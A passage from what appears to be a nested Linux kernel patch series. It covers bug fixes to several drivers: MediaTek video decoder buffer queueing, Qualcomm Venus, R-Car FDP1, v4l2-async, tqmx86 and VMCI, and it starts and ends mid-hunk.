++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
+@@ -11,7 +11,7 @@
+ #include "mtk_vcodec_dec_pm.h"
+ #include "vdec_drv_if.h"
+ 
+-static const struct mtk_video_fmt mtk_video_formats[] = {
++static struct mtk_video_fmt mtk_video_formats[] = {
+ 	{
+ 		.fourcc = V4L2_PIX_FMT_H264,
+ 		.type = MTK_FMT_DEC,
+@@ -580,6 +580,16 @@ static int mtk_vcodec_dec_ctrls_setup(struct mtk_vcodec_ctx *ctx)
+ 
+ static void mtk_init_vdec_params(struct mtk_vcodec_ctx *ctx)
+ {
++	unsigned int i;
++
++	if (!(ctx->dev->dec_capability & VCODEC_CAPABILITY_4K_DISABLED)) {
++		for (i = 0; i < num_supported_formats; i++) {
++			mtk_video_formats[i].frmsize.max_width =
++				VCODEC_DEC_4K_CODED_WIDTH;
++			mtk_video_formats[i].frmsize.max_height =
++				VCODEC_DEC_4K_CODED_HEIGHT;
++		}
++	}
+ }
+ 
+ static struct vb2_ops mtk_vdec_frame_vb2_ops = {
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
+index ffbcee04dc26f..3000db975e5f5 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
+@@ -258,8 +258,10 @@ static void mtk_vdec_worker(struct work_struct *work)
+ 		if (src_buf_req)
+ 			v4l2_ctrl_request_complete(src_buf_req, &ctx->ctrl_hdl);
+ 	} else {
+-		v4l2_m2m_src_buf_remove(ctx->m2m_ctx);
+-		v4l2_m2m_buf_done(vb2_v4l2_src, state);
++		if (ret != -EAGAIN) {
++			v4l2_m2m_src_buf_remove(ctx->m2m_ctx);
++			v4l2_m2m_buf_done(vb2_v4l2_src, state);
++		}
+ 		v4l2_m2m_job_finish(dev->m2m_dev_dec, ctx->m2m_ctx);
+ 	}
+ }
+@@ -390,14 +392,14 @@ static void mtk_vcodec_get_supported_formats(struct mtk_vcodec_ctx *ctx)
+ 	if (num_formats)
+ 		return;
+ 
+-	if (ctx->dev->dec_capability & MTK_VDEC_FORMAT_MM21) {
+-		mtk_vcodec_add_formats(V4L2_PIX_FMT_MM21, ctx);
+-		cap_format_count++;
+-	}
+ 	if (ctx->dev->dec_capability & MTK_VDEC_FORMAT_MT21C) {
+ 		mtk_vcodec_add_formats(V4L2_PIX_FMT_MT21C, ctx);
+ 		cap_format_count++;
+ 	}
++	if (ctx->dev->dec_capability & MTK_VDEC_FORMAT_MM21) {
++		mtk_vcodec_add_formats(V4L2_PIX_FMT_MM21, ctx);
++		cap_format_count++;
++	}
+ 	if (ctx->dev->dec_capability & MTK_VDEC_FORMAT_H264_SLICE) {
+ 		mtk_vcodec_add_formats(V4L2_PIX_FMT_H264_SLICE, ctx);
+ 		out_format_count++;
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c b/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
+index 955b2d0c8f53f..999ce7ee5fdc2 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
+@@ -597,7 +597,7 @@ static int vdec_h264_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	lat_buf = vdec_msg_queue_dqbuf(&inst->ctx->msg_queue.lat_ctx);
+ 	if (!lat_buf) {
+ 		mtk_vcodec_err(inst, "failed to get lat buffer");
+-		return -EINVAL;
++		return -EAGAIN;
+ 	}
+ 	share_info = lat_buf->private_data;
+ 	src_buf_info = container_of(bs, struct mtk_video_dec_buf, bs_buffer);
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c b/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
+index cbb6728b8a40b..cf16cf2807f07 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
+@@ -2070,7 +2070,7 @@ static int vdec_vp9_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	lat_buf = vdec_msg_queue_dqbuf(&instance->ctx->msg_queue.lat_ctx);
+ 	if (!lat_buf) {
+ 		mtk_vcodec_err(instance, "Failed to get VP9 lat buf\n");
+-		return -EBUSY;
++		return -EAGAIN;
+ 	}
+ 	pfc = (struct vdec_vp9_slice_pfc *)lat_buf->private_data;
+ 	if (!pfc) {
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+index dc2004790a472..f3073d1e7f420 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+@@ -52,9 +52,26 @@ static struct list_head *vdec_get_buf_list(int hardware_index, struct vdec_lat_b
+ 	}
+ }
+ 
++static void vdec_msg_queue_inc(struct vdec_msg_queue *msg_queue, int hardware_index)
++{
++	if (hardware_index == MTK_VDEC_CORE)
++		atomic_inc(&msg_queue->core_list_cnt);
++	else
++		atomic_inc(&msg_queue->lat_list_cnt);
++}
++
++static void vdec_msg_queue_dec(struct vdec_msg_queue *msg_queue, int hardware_index)
++{
++	if (hardware_index == MTK_VDEC_CORE)
++		atomic_dec(&msg_queue->core_list_cnt);
++	else
++		atomic_dec(&msg_queue->lat_list_cnt);
++}
++
+ int vdec_msg_queue_qbuf(struct vdec_msg_queue_ctx *msg_ctx, struct vdec_lat_buf *buf)
+ {
+ 	struct list_head *head;
++	int status;
+ 
+ 	head = vdec_get_buf_list(msg_ctx->hardware_index, buf);
+ 	if (!head) {
+@@ -66,11 +83,18 @@ int vdec_msg_queue_qbuf(struct vdec_msg_queue_ctx *msg_ctx, struct vdec_lat_buf
+ 	list_add_tail(head, &msg_ctx->ready_queue);
+ 	msg_ctx->ready_num++;
+ 
+-	if (msg_ctx->hardware_index != MTK_VDEC_CORE)
++	vdec_msg_queue_inc(&buf->ctx->msg_queue, msg_ctx->hardware_index);
++	if (msg_ctx->hardware_index != MTK_VDEC_CORE) {
+ 		wake_up_all(&msg_ctx->ready_to_use);
+-	else
+-		queue_work(buf->ctx->dev->core_workqueue,
+-			   &buf->ctx->msg_queue.core_work);
++	} else {
++		if (buf->ctx->msg_queue.core_work_cnt <
++			atomic_read(&buf->ctx->msg_queue.core_list_cnt)) {
++			status = queue_work(buf->ctx->dev->core_workqueue,
++					    &buf->ctx->msg_queue.core_work);
++			if (status)
++				buf->ctx->msg_queue.core_work_cnt++;
++		}
++	}
+ 
+ 	mtk_v4l2_debug(3, "enqueue buf type: %d addr: 0x%p num: %d",
+ 		       msg_ctx->hardware_index, buf, msg_ctx->ready_num);
+@@ -127,6 +151,7 @@ struct vdec_lat_buf *vdec_msg_queue_dqbuf(struct vdec_msg_queue_ctx *msg_ctx)
+ 		return NULL;
+ 	}
+ 	list_del(head);
++	vdec_msg_queue_dec(&buf->ctx->msg_queue, msg_ctx->hardware_index);
+ 
+ 	msg_ctx->ready_num--;
+ 	mtk_v4l2_debug(3, "dqueue buf type:%d addr: 0x%p num: %d",
+@@ -156,11 +181,29 @@ void vdec_msg_queue_update_ube_wptr(struct vdec_msg_queue *msg_queue, uint64_t u
+ 
+ bool vdec_msg_queue_wait_lat_buf_full(struct vdec_msg_queue *msg_queue)
+ {
++	struct vdec_lat_buf *buf, *tmp;
++	struct list_head *list_core[3];
++	struct vdec_msg_queue_ctx *core_ctx;
++	int ret, i, in_core_count = 0, count = 0;
+ 	long timeout_jiff;
+-	int ret;
++
++	core_ctx = &msg_queue->ctx->dev->msg_queue_core_ctx;
++	spin_lock(&core_ctx->ready_lock);
++	list_for_each_entry_safe(buf, tmp, &core_ctx->ready_queue, core_list) {
++		if (buf && buf->ctx == msg_queue->ctx) {
++			list_core[in_core_count++] = &buf->core_list;
++			list_del(&buf->core_list);
++		}
++	}
++
++	for (i = 0; i < in_core_count; i++) {
++		list_add(list_core[in_core_count - (1 + i)], &core_ctx->ready_queue);
++		queue_work(msg_queue->ctx->dev->core_workqueue, &msg_queue->core_work);
++	}
++	spin_unlock(&core_ctx->ready_lock);
+ 
+ 	timeout_jiff = msecs_to_jiffies(1000 * (NUM_BUFFER_COUNT + 2));
+-	ret = wait_event_timeout(msg_queue->lat_ctx.ready_to_use,
++	ret = wait_event_timeout(msg_queue->ctx->msg_queue.core_dec_done,
+ 				 msg_queue->lat_ctx.ready_num == NUM_BUFFER_COUNT,
+ 				 timeout_jiff);
+ 	if (ret) {
+@@ -168,8 +211,20 @@ bool vdec_msg_queue_wait_lat_buf_full(struct vdec_msg_queue *msg_queue)
+ 			       msg_queue->lat_ctx.ready_num);
+ 		return true;
+ 	}
+-	mtk_v4l2_err("failed with lat buf isn't full: %d",
+-		     msg_queue->lat_ctx.ready_num);
++
++	spin_lock(&core_ctx->ready_lock);
++	list_for_each_entry_safe(buf, tmp, &core_ctx->ready_queue, core_list) {
++		if (buf && buf->ctx == msg_queue->ctx) {
++			count++;
++			list_del(&buf->core_list);
++		}
++	}
++	spin_unlock(&core_ctx->ready_lock);
++
++	mtk_v4l2_err("failed with lat buf isn't full: list(%d %d) count:%d",
++		     atomic_read(&msg_queue->lat_list_cnt),
++		     atomic_read(&msg_queue->core_list_cnt), count);
++
+ 	return false;
+ }
+ 
+@@ -206,6 +261,7 @@ static void vdec_msg_queue_core_work(struct work_struct *work)
+ 		container_of(msg_queue, struct mtk_vcodec_ctx, msg_queue);
+ 	struct mtk_vcodec_dev *dev = ctx->dev;
+ 	struct vdec_lat_buf *lat_buf;
++	int status;
+ 
+ 	lat_buf = vdec_msg_queue_dqbuf(&dev->msg_queue_core_ctx);
+ 	if (!lat_buf)
+@@ -221,11 +277,18 @@ static void vdec_msg_queue_core_work(struct work_struct *work)
+ 	mtk_vcodec_dec_disable_hardware(ctx, MTK_VDEC_CORE);
+ 	vdec_msg_queue_qbuf(&ctx->msg_queue.lat_ctx, lat_buf);
+ 
+-	if (!list_empty(&dev->msg_queue_core_ctx.ready_queue)) {
+-		mtk_v4l2_debug(3, "re-schedule to decode for core: %d",
+-			       dev->msg_queue_core_ctx.ready_num);
+-		queue_work(dev->core_workqueue, &msg_queue->core_work);
++	wake_up_all(&ctx->msg_queue.core_dec_done);
++	spin_lock(&dev->msg_queue_core_ctx.ready_lock);
++	lat_buf->ctx->msg_queue.core_work_cnt--;
++
++	if (lat_buf->ctx->msg_queue.core_work_cnt <
++		atomic_read(&lat_buf->ctx->msg_queue.core_list_cnt)) {
++		status = queue_work(lat_buf->ctx->dev->core_workqueue,
++				    &lat_buf->ctx->msg_queue.core_work);
++		if (status)
++			lat_buf->ctx->msg_queue.core_work_cnt++;
+ 	}
++	spin_unlock(&dev->msg_queue_core_ctx.ready_lock);
+ }
+ 
+ int vdec_msg_queue_init(struct vdec_msg_queue *msg_queue,
+@@ -239,12 +302,18 @@ int vdec_msg_queue_init(struct vdec_msg_queue *msg_queue,
+ 	if (msg_queue->wdma_addr.size)
+ 		return 0;
+ 
++	msg_queue->ctx = ctx;
++	msg_queue->core_work_cnt = 0;
+ 	vdec_msg_queue_init_ctx(&msg_queue->lat_ctx, MTK_VDEC_LAT0);
+ 	INIT_WORK(&msg_queue->core_work, vdec_msg_queue_core_work);
++
++	atomic_set(&msg_queue->lat_list_cnt, 0);
++	atomic_set(&msg_queue->core_list_cnt, 0);
++	init_waitqueue_head(&msg_queue->core_dec_done);
++
+ 	msg_queue->wdma_addr.size =
+ 		vde_msg_queue_get_trans_size(ctx->picinfo.buf_w,
+ 					     ctx->picinfo.buf_h);
+-
+ 	err = mtk_vcodec_mem_alloc(ctx, &msg_queue->wdma_addr);
+ 	if (err) {
+ 		mtk_v4l2_err("failed to allocate wdma_addr buf");
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
+index c43d427f5f544..a5d44bc97c16b 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
++++ b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
+@@ -72,6 +72,12 @@ struct vdec_lat_buf {
+  * @wdma_wptr_addr: ube write point
+  * @core_work: core hardware work
+  * @lat_ctx: used to store lat buffer list
++ * @ctx: point to mtk_vcodec_ctx
++ *
++ * @lat_list_cnt: used to record each instance lat list count
++ * @core_list_cnt: used to record each instance core list count
++ * @core_dec_done: core work queue decode done event
++ * @core_work_cnt: the number of core work in work queue
+  */
+ struct vdec_msg_queue {
+ 	struct vdec_lat_buf lat_buf[NUM_BUFFER_COUNT];
+@@ -82,6 +88,12 @@ struct vdec_msg_queue {
+ 
+ 	struct work_struct core_work;
+ 	struct vdec_msg_queue_ctx lat_ctx;
++	struct mtk_vcodec_ctx *ctx;
++
++	atomic_t lat_list_cnt;
++	atomic_t core_list_cnt;
++	wait_queue_head_t core_dec_done;
++	int core_work_cnt;
+ };
+ 
+ /**
+diff --git a/drivers/media/platform/qcom/venus/vdec.c b/drivers/media/platform/qcom/venus/vdec.c
+index 4ceaba37e2e57..1a52c2ea2da5b 100644
+--- a/drivers/media/platform/qcom/venus/vdec.c
++++ b/drivers/media/platform/qcom/venus/vdec.c
+@@ -31,15 +31,15 @@
+  */
+ static const struct venus_format vdec_formats[] = {
+ 	{
+-		.pixfmt = V4L2_PIX_FMT_QC08C,
++		.pixfmt = V4L2_PIX_FMT_NV12,
+ 		.num_planes = 1,
+ 		.type = V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE,
+ 	}, {
+-		.pixfmt = V4L2_PIX_FMT_QC10C,
++		.pixfmt = V4L2_PIX_FMT_QC08C,
+ 		.num_planes = 1,
+ 		.type = V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE,
+-	},{
+-		.pixfmt = V4L2_PIX_FMT_NV12,
++	}, {
++		.pixfmt = V4L2_PIX_FMT_QC10C,
+ 		.num_planes = 1,
+ 		.type = V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE,
+ 	}, {
+@@ -526,6 +526,7 @@ static int
+ vdec_decoder_cmd(struct file *file, void *fh, struct v4l2_decoder_cmd *cmd)
+ {
+ 	struct venus_inst *inst = to_inst(file);
++	struct vb2_queue *dst_vq;
+ 	struct hfi_frame_data fdata = {0};
+ 	int ret;
+ 
+@@ -556,6 +557,13 @@ vdec_decoder_cmd(struct file *file, void *fh, struct v4l2_decoder_cmd *cmd)
+ 			inst->codec_state = VENUS_DEC_STATE_DRAIN;
+ 			inst->drain_active = true;
+ 		}
++	} else if (cmd->cmd == V4L2_DEC_CMD_START &&
++		   inst->codec_state == VENUS_DEC_STATE_STOPPED) {
++		dst_vq = v4l2_m2m_get_vq(inst->fh.m2m_ctx,
++					 V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE);
++		vb2_clear_last_buffer_dequeued(dst_vq);
++
++		inst->codec_state = VENUS_DEC_STATE_DECODING;
+ 	}
+ 
+ unlock:
+diff --git a/drivers/media/platform/renesas/rcar_fdp1.c b/drivers/media/platform/renesas/rcar_fdp1.c
+index 37ecf489d112e..dea22e3579052 100644
+--- a/drivers/media/platform/renesas/rcar_fdp1.c
++++ b/drivers/media/platform/renesas/rcar_fdp1.c
+@@ -2313,8 +2313,10 @@ static int fdp1_probe(struct platform_device *pdev)
+ 
+ 	/* Determine our clock rate */
+ 	clk = clk_get(&pdev->dev, NULL);
+-	if (IS_ERR(clk))
+-		return PTR_ERR(clk);
++	if (IS_ERR(clk)) {
++		ret = PTR_ERR(clk);
++		goto put_dev;
++	}
+ 
+ 	fdp1->clk_rate = clk_get_rate(clk);
+ 	clk_put(clk);
+@@ -2323,7 +2325,7 @@ static int fdp1_probe(struct platform_device *pdev)
+ 	ret = v4l2_device_register(&pdev->dev, &fdp1->v4l2_dev);
+ 	if (ret) {
+ 		v4l2_err(&fdp1->v4l2_dev, "Failed to register video device\n");
+-		return ret;
++		goto put_dev;
+ 	}
+ 
+ 	/* M2M registration */
+@@ -2393,6 +2395,8 @@ release_m2m:
+ unreg_dev:
+ 	v4l2_device_unregister(&fdp1->v4l2_dev);
+ 
++put_dev:
++	rcar_fcp_put(fdp1->fcp);
+ 	return ret;
+ }
+ 
+@@ -2404,6 +2408,7 @@ static int fdp1_remove(struct platform_device *pdev)
+ 	video_unregister_device(&fdp1->vfd);
+ 	v4l2_device_unregister(&fdp1->v4l2_dev);
+ 	pm_runtime_disable(&pdev->dev);
++	rcar_fcp_put(fdp1->fcp);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/media/platform/st/sti/bdisp/bdisp-v4l2.c b/drivers/media/platform/st/sti/bdisp/bdisp-v4l2.c
+index dd74cc43920d3..080da254b9109 100644
+--- a/drivers/media/platform/st/sti/bdisp/bdisp-v4l2.c
++++ b/drivers/media/platform/st/sti/bdisp/bdisp-v4l2.c
+@@ -1309,6 +1309,8 @@ static int bdisp_probe(struct platform_device *pdev)
+ 	init_waitqueue_head(&bdisp->irq_queue);
+ 	INIT_DELAYED_WORK(&bdisp->timeout_work, bdisp_irq_timeout);
+ 	bdisp->work_queue = create_workqueue(BDISP_NAME);
++	if (!bdisp->work_queue)
++		return -ENOMEM;
+ 
+ 	spin_lock_init(&bdisp->slock);
+ 	mutex_init(&bdisp->lock);
+diff --git a/drivers/media/rc/gpio-ir-recv.c b/drivers/media/rc/gpio-ir-recv.c
+index a56c844d7f816..16795e07dc103 100644
+--- a/drivers/media/rc/gpio-ir-recv.c
++++ b/drivers/media/rc/gpio-ir-recv.c
+@@ -107,6 +107,8 @@ static int gpio_ir_recv_probe(struct platform_device *pdev)
+ 		rcdev->map_name = RC_MAP_EMPTY;
+ 
+ 	gpio_dev->rcdev = rcdev;
++	if (of_property_read_bool(np, "wakeup-source"))
++		device_init_wakeup(dev, true);
+ 
+ 	rc = devm_rc_register_device(dev, rcdev);
+ 	if (rc < 0) {
+diff --git a/drivers/media/v4l2-core/v4l2-async.c b/drivers/media/v4l2-core/v4l2-async.c
+index 2f1b718a91893..008a2a3e312e0 100644
+--- a/drivers/media/v4l2-core/v4l2-async.c
++++ b/drivers/media/v4l2-core/v4l2-async.c
+@@ -414,7 +414,8 @@ static void v4l2_async_cleanup(struct v4l2_subdev *sd)
+ 
+ /* Unbind all sub-devices in the notifier tree. */
+ static void
+-v4l2_async_nf_unbind_all_subdevs(struct v4l2_async_notifier *notifier)
++v4l2_async_nf_unbind_all_subdevs(struct v4l2_async_notifier *notifier,
++				 bool readd)
+ {
+ 	struct v4l2_subdev *sd, *tmp;
+ 
+@@ -423,9 +424,11 @@ v4l2_async_nf_unbind_all_subdevs(struct v4l2_async_notifier *notifier)
+ 			v4l2_async_find_subdev_notifier(sd);
+ 
+ 		if (subdev_notifier)
+-			v4l2_async_nf_unbind_all_subdevs(subdev_notifier);
++			v4l2_async_nf_unbind_all_subdevs(subdev_notifier, true);
+ 
+ 		v4l2_async_nf_call_unbind(notifier, sd, sd->asd);
++		if (readd)
++			list_add_tail(&sd->asd->list, &notifier->waiting);
+ 		v4l2_async_cleanup(sd);
+ 
+ 		list_move(&sd->async_list, &subdev_list);
+@@ -557,7 +560,7 @@ err_unbind:
+ 	/*
+ 	 * On failure, unbind all sub-devices registered through this notifier.
+ 	 */
+-	v4l2_async_nf_unbind_all_subdevs(notifier);
++	v4l2_async_nf_unbind_all_subdevs(notifier, false);
+ 
+ err_unlock:
+ 	mutex_unlock(&list_lock);
+@@ -607,7 +610,7 @@ __v4l2_async_nf_unregister(struct v4l2_async_notifier *notifier)
+ 	if (!notifier || (!notifier->v4l2_dev && !notifier->sd))
+ 		return;
+ 
+-	v4l2_async_nf_unbind_all_subdevs(notifier);
++	v4l2_async_nf_unbind_all_subdevs(notifier, false);
+ 
+ 	notifier->sd = NULL;
+ 	notifier->v4l2_dev = NULL;
+@@ -805,7 +808,7 @@ err_unbind:
+ 	 */
+ 	subdev_notifier = v4l2_async_find_subdev_notifier(sd);
+ 	if (subdev_notifier)
+-		v4l2_async_nf_unbind_all_subdevs(subdev_notifier);
++		v4l2_async_nf_unbind_all_subdevs(subdev_notifier, false);
+ 
+ 	if (sd->asd)
+ 		v4l2_async_nf_call_unbind(notifier, sd, sd->asd);
+diff --git a/drivers/mfd/arizona-spi.c b/drivers/mfd/arizona-spi.c
+index 941b0267d09d4..5c4af05ed0440 100644
+--- a/drivers/mfd/arizona-spi.c
++++ b/drivers/mfd/arizona-spi.c
+@@ -277,6 +277,7 @@ static const struct of_device_id arizona_spi_of_match[] = {
+ 	{ .compatible = "cirrus,cs47l24", .data = (void *)CS47L24 },
+ 	{},
+ };
++MODULE_DEVICE_TABLE(of, arizona_spi_of_match);
+ #endif
+ 
+ static struct spi_driver arizona_spi_driver = {
+diff --git a/drivers/mfd/ocelot-spi.c b/drivers/mfd/ocelot-spi.c
+index 2ecd271de2fb9..85021f94e5874 100644
+--- a/drivers/mfd/ocelot-spi.c
++++ b/drivers/mfd/ocelot-spi.c
+@@ -130,6 +130,7 @@ static const struct regmap_config ocelot_spi_regmap_config = {
+ 
+ 	.write_flag_mask = 0x80,
+ 
++	.use_single_read = true,
+ 	.use_single_write = true,
+ 	.can_multi_write = false,
+ 
+diff --git a/drivers/mfd/tqmx86.c b/drivers/mfd/tqmx86.c
+index 7ae906ff8e353..fac02875fe7d9 100644
+--- a/drivers/mfd/tqmx86.c
++++ b/drivers/mfd/tqmx86.c
+@@ -16,8 +16,8 @@
+ #include <linux/platform_data/i2c-ocores.h>
+ #include <linux/platform_device.h>
+ 
+-#define TQMX86_IOBASE	0x160
+-#define TQMX86_IOSIZE	0x3f
++#define TQMX86_IOBASE	0x180
++#define TQMX86_IOSIZE	0x20
+ #define TQMX86_IOBASE_I2C	0x1a0
+ #define TQMX86_IOSIZE_I2C	0xa
+ #define TQMX86_IOBASE_WATCHDOG	0x18b
+@@ -25,14 +25,14 @@
+ #define TQMX86_IOBASE_GPIO	0x18d
+ #define TQMX86_IOSIZE_GPIO	0x4
+ 
+-#define TQMX86_REG_BOARD_ID	0x20
++#define TQMX86_REG_BOARD_ID	0x00
+ #define TQMX86_REG_BOARD_ID_E38M	1
+ #define TQMX86_REG_BOARD_ID_50UC	2
+ #define TQMX86_REG_BOARD_ID_E38C	3
+ #define TQMX86_REG_BOARD_ID_60EB	4
+-#define TQMX86_REG_BOARD_ID_E39M	5
+-#define TQMX86_REG_BOARD_ID_E39C	6
+-#define TQMX86_REG_BOARD_ID_E39x	7
++#define TQMX86_REG_BOARD_ID_E39MS	5
++#define TQMX86_REG_BOARD_ID_E39C1	6
++#define TQMX86_REG_BOARD_ID_E39C2	7
+ #define TQMX86_REG_BOARD_ID_70EB	8
+ #define TQMX86_REG_BOARD_ID_80UC	9
+ #define TQMX86_REG_BOARD_ID_110EB	11
+@@ -40,18 +40,18 @@
+ #define TQMX86_REG_BOARD_ID_E40S	13
+ #define TQMX86_REG_BOARD_ID_E40C1	14
+ #define TQMX86_REG_BOARD_ID_E40C2	15
+-#define TQMX86_REG_BOARD_REV	0x21
+-#define TQMX86_REG_IO_EXT_INT	0x26
++#define TQMX86_REG_BOARD_REV	0x01
++#define TQMX86_REG_IO_EXT_INT	0x06
+ #define TQMX86_REG_IO_EXT_INT_NONE		0
+ #define TQMX86_REG_IO_EXT_INT_7			1
+ #define TQMX86_REG_IO_EXT_INT_9			2
+ #define TQMX86_REG_IO_EXT_INT_12		3
+ #define TQMX86_REG_IO_EXT_INT_MASK		0x3
+ #define TQMX86_REG_IO_EXT_INT_GPIO_SHIFT	4
++#define TQMX86_REG_SAUC		0x17
+ 
+-#define TQMX86_REG_I2C_DETECT	0x47
++#define TQMX86_REG_I2C_DETECT	0x1a7
+ #define TQMX86_REG_I2C_DETECT_SOFT		0xa5
+-#define TQMX86_REG_I2C_INT_EN	0x49
+ 
+ static uint gpio_irq;
+ module_param(gpio_irq, uint, 0);
+@@ -111,7 +111,7 @@ static const struct mfd_cell tqmx86_devs[] = {
+ 	},
+ };
+ 
+-static const char *tqmx86_board_id_to_name(u8 board_id)
++static const char *tqmx86_board_id_to_name(u8 board_id, u8 sauc)
+ {
+ 	switch (board_id) {
+ 	case TQMX86_REG_BOARD_ID_E38M:
+@@ -122,12 +122,12 @@ static const char *tqmx86_board_id_to_name(u8 board_id)
+ 		return "TQMxE38C";
+ 	case TQMX86_REG_BOARD_ID_60EB:
+ 		return "TQMx60EB";
+-	case TQMX86_REG_BOARD_ID_E39M:
+-		return "TQMxE39M";
+-	case TQMX86_REG_BOARD_ID_E39C:
+-		return "TQMxE39C";
+-	case TQMX86_REG_BOARD_ID_E39x:
+-		return "TQMxE39x";
++	case TQMX86_REG_BOARD_ID_E39MS:
++		return (sauc == 0xff) ? "TQMxE39M" : "TQMxE39S";
++	case TQMX86_REG_BOARD_ID_E39C1:
++		return "TQMxE39C1";
++	case TQMX86_REG_BOARD_ID_E39C2:
++		return "TQMxE39C2";
+ 	case TQMX86_REG_BOARD_ID_70EB:
+ 		return "TQMx70EB";
+ 	case TQMX86_REG_BOARD_ID_80UC:
+@@ -160,9 +160,9 @@ static int tqmx86_board_id_to_clk_rate(struct device *dev, u8 board_id)
+ 	case TQMX86_REG_BOARD_ID_E40C1:
+ 	case TQMX86_REG_BOARD_ID_E40C2:
+ 		return 24000;
+-	case TQMX86_REG_BOARD_ID_E39M:
+-	case TQMX86_REG_BOARD_ID_E39C:
+-	case TQMX86_REG_BOARD_ID_E39x:
++	case TQMX86_REG_BOARD_ID_E39MS:
++	case TQMX86_REG_BOARD_ID_E39C1:
++	case TQMX86_REG_BOARD_ID_E39C2:
+ 		return 25000;
+ 	case TQMX86_REG_BOARD_ID_E38M:
+ 	case TQMX86_REG_BOARD_ID_E38C:
+@@ -176,7 +176,7 @@ static int tqmx86_board_id_to_clk_rate(struct device *dev, u8 board_id)
+ 
+ static int tqmx86_probe(struct platform_device *pdev)
+ {
+-	u8 board_id, rev, i2c_det, io_ext_int_val;
++	u8 board_id, sauc, rev, i2c_det, io_ext_int_val;
+ 	struct device *dev = &pdev->dev;
+ 	u8 gpio_irq_cfg, readback;
+ 	const char *board_name;
+@@ -206,14 +206,20 @@ static int tqmx86_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	board_id = ioread8(io_base + TQMX86_REG_BOARD_ID);
+-	board_name = tqmx86_board_id_to_name(board_id);
++	sauc = ioread8(io_base + TQMX86_REG_SAUC);
++	board_name = tqmx86_board_id_to_name(board_id, sauc);
+ 	rev = ioread8(io_base + TQMX86_REG_BOARD_REV);
+ 
+ 	dev_info(dev,
+ 		 "Found %s - Board ID %d, PCB Revision %d, PLD Revision %d\n",
+ 		 board_name, board_id, rev >> 4, rev & 0xf);
+ 
+-	i2c_det = ioread8(io_base + TQMX86_REG_I2C_DETECT);
++	/*
++	 * The I2C_DETECT register is in the range assigned to the I2C driver
++	 * later, so we don't extend TQMX86_IOSIZE. Use inb() for this one-off
++	 * access instead of ioport_map + unmap.
++	 */
++	i2c_det = inb(TQMX86_REG_I2C_DETECT);
+ 
+ 	if (gpio_irq_cfg) {
+ 		io_ext_int_val =
+diff --git a/drivers/misc/vmw_vmci/vmci_host.c b/drivers/misc/vmw_vmci/vmci_host.c
+index 857b9851402a6..abe79f6fd2a79 100644
+--- a/drivers/misc/vmw_vmci/vmci_host.c
++++ b/drivers/misc/vmw_vmci/vmci_host.c
+@@ -165,10 +165,16 @@ static int vmci_host_close(struct inode *inode, struct file *filp)
+ static __poll_t vmci_host_poll(struct file *filp, poll_table *wait)
+ {
+ 	struct vmci_host_dev *vmci_host_dev = filp->private_data;
+-	struct vmci_ctx *context = vmci_host_dev->context;
++	struct vmci_ctx *context;
+ 	__poll_t mask = 0;
+ 
+ 	if (vmci_host_dev->ct_type == VMCIOBJ_CONTEXT) {
++		/*
++		 * Read context only if ct_type == VMCIOBJ_CONTEXT to make
++		 * sure that context is initialized
++		 */
++		context = vmci_host_dev->context;
++
+ 		/* Check for VMCI calls to this VM context. */
+ 		if (wait)
+ 			poll_wait(filp, &context->host_context.wait_queue,
+diff --git a/drivers/mmc/host/sdhci-of-esdhc.c b/drivers/mmc/host/sdhci-of-esdhc.c
+index e0266638381d0..6ae68e379f7e3 100644
+--- a/drivers/mmc/host/sdhci-of-esdhc.c
++++ b/drivers/mmc/host/sdhci-of-esdhc.c
+@@ -126,6 +126,7 @@ static u32 esdhc_readl_fixup(struct sdhci_host *host,
+ 			return ret;
+ 		}
+ 	}
++
+ 	/*
+ 	 * The DAT[3:0] line signal levels and the CMD line signal level are
+ 	 * not compatible with standard SDHC register. The line signal levels
+@@ -137,6 +138,16 @@ static u32 esdhc_readl_fixup(struct sdhci_host *host,
+ 		ret = value & 0x000fffff;
+ 		ret |= (value >> 4) & SDHCI_DATA_LVL_MASK;
+ 		ret |= (value << 1) & SDHCI_CMD_LVL;
++
++		/*
++		 * Some controllers have unreliable Data Line Active
++		 * bit for commands with busy signal. This affects
++		 * Command Inhibit (data) bit. Just ignore it since
++		 * MMC core driver has already polled card status
++		 * with CMD13 after any command with busy siganl.
++		 */
++		if (esdhc->quirk_ignore_data_inhibit)
++			ret &= ~SDHCI_DATA_INHIBIT;
+ 		return ret;
+ 	}
+ 
+@@ -151,19 +162,6 @@ static u32 esdhc_readl_fixup(struct sdhci_host *host,
+ 		return ret;
+ 	}
+ 
+-	/*
+-	 * Some controllers have unreliable Data Line Active
